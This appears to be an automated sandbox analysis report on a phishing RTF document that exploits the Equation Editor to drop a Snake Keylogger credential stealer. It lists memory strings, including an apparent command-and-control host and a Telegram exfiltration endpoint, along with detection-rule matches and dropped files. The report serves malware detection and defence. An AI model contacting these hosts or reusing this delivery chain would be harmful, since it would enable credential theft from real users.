                Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: hgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe..0
                Source: hgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/D
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0Q
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: hgqilegacy20306.exe, 00000005.00000002.406450755.0000000002237000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: initial sampleStatic file information: Filename: Thyssenkrupp PO040232.doc
                Source: Thyssenkrupp PO040232.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 77630000 page read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_002307605_2_00230760
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_002377F05_2_002377F0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_00233C105_2_00233C10
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_0023B0C85_2_0023B0C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_002312195_2_00231219
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_0023A3705_2_0023A370
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_0023A7A85_2_0023A7A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_0023A7985_2_0023A798
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_002377E05_2_002377E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_0023BBA05_2_0023BBA0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_0023BB905_2_0023BB90
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_0023ABE05_2_0023ABE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002540F88_2_002540F8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002581008_2_00258100
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002549688_2_00254968
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002531B18_2_002531B1
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002569B88_2_002569B8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00259A4C8_2_00259A4C
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00253B588_2_00253B58
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002543C88_2_002543C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002534838_2_00253483
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002574908_2_00257490
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00255D008_2_00255D00
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025DD508_2_0025DD50
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00259DB08_2_00259DB0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00253E288_2_00253E28
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002546998_2_00254699
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00258EC48_2_00258EC4
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002587E08_2_002587E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025E8A88_2_0025E8A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025F1D98_2_0025F1D9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025FB088_2_0025FB08
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025DD418_2_0025DD41
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025ED408_2_0025ED40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025D5B88_2_0025D5B8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025D5C88_2_0025D5C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0025F6708_2_0025F670
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005600408_2_00560040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005632408_2_00563240
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005664408_2_00566440
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00561C608_2_00561C60
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00564E608_2_00564E60
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005680608_2_00568060
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00562C008_2_00562C00
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00565E008_2_00565E00
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005690008_2_00569000
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005616208_2_00561620
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005648208_2_00564820
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00567A208_2_00567A20
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00560CC08_2_00560CC0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00563EC08_2_00563EC0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005670C08_2_005670C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005628E08_2_005628E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00565AE08_2_00565AE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00568CE08_2_00568CE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005606808_2_00560680
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005638808_2_00563880
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00566A808_2_00566A80
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005622A08_2_005622A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005654A08_2_005654A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005686A08_2_005686A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005619408_2_00561940
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00564B408_2_00564B40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00567D408_2_00567D40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005603608_2_00560360
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005635608_2_00563560
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005667608_2_00566760
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005613008_2_00561300
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005645008_2_00564500
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005677008_2_00567700
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00562F208_2_00562F20
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005661208_2_00566120
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005625C08_2_005625C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005657C08_2_005657C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005689C08_2_005689C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00560FE08_2_00560FE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005641E08_2_005641E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005673E08_2_005673E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005609908_2_00560990
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00561F808_2_00561F80
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005651808_2_00565180
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005683808_2_00568380
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005609A08_2_005609A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00563BA08_2_00563BA0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00566DA08_2_00566DA0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F82B08_2_005F82B0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F37518_2_005F3751
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F40508_2_005F4050
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FE2508_2_005FE250
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F9F4F8_2_005F9F4F
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F57488_2_005F5748
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FB7488_2_005FB748
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F00408_2_005F0040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F6E408_2_005F6E40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F8C408_2_005F8C40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F40408_2_005F4040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F60788_2_005F6078
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F87788_2_005F8778
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FDD788_2_005FDD78
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FB2728_2_005FB272
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F09708_2_005F0970
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F77708_2_005F7770
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FF5708_2_005FF570
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F49708_2_005F4970
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F20688_2_005F2068
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FCA688_2_005FCA68
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F60688_2_005F6068
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F87678_2_005F8767
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F37608_2_005F3760
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F9F608_2_005F9F60
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F09608_2_005F0960
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F77608_2_005F7760
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F4E188_2_005F4E18
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FE7188_2_005FE718
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FA4188_2_005FA418
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F65108_2_005F6510
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FBC108_2_005FBC10
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FE70A8_2_005FE70A
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F4E098_2_005F4E09
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F0E088_2_005F0E08
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F7C088_2_005F7C08
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F91088_2_005F9108
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F25008_2_005F2500
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F65008_2_005F6500
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FE23F8_2_005FE23F
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F57398_2_005F5739
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F17388_2_005F1738
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FFA388_2_005FFA38
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FB7378_2_005FB737
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F6E328_2_005F6E32
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F8C318_2_005F8C31
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F2E308_2_005F2E30
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FCF308_2_005FCF30
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FA4288_2_005FA428
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FFA288_2_005FFA28
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FCF208_2_005FCF20
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F04D88_2_005F04D8
